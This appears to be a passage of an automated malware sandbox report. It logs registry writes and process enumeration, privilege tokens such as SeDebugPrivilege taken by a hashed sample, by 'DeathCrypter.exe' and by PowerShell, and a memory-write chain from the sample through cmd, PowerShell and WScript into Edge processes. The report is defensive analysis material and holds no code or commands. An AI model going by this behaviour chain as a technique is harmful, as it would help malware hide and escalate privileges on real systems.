Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133619795264356812" C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133619795272370461" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU\PCT = "133596455532000969" C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133619795928288674" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1 C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133619795593243505" C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133619795953768640" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1 C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133619795609863446" C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133619795972308645" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1\LU C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133619795139064287" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU\ICT = "133596455534500937" C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133619795944398684" C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133619796293638661" C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133619796307798852" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133619794931015894" C:\Windows\system32\svchost.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5112 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe C:\Windows\system32\cmd.exe
PID 5112 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe C:\Windows\system32\cmd.exe
PID 5112 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe
PID 5112 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe
PID 1716 wrote to memory of 4844 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1716 wrote to memory of 4844 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1716 wrote to memory of 4920 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1716 wrote to memory of 4920 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4920 wrote to memory of 5048 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4920 wrote to memory of 5048 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4920 wrote to memory of 4652 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 4920 wrote to memory of 4652 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 4652 wrote to memory of 2636 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 4652 wrote to memory of 2636 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 1968 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1968 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 2468 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 2468 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 1352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 1352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 1352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 1352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 1352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
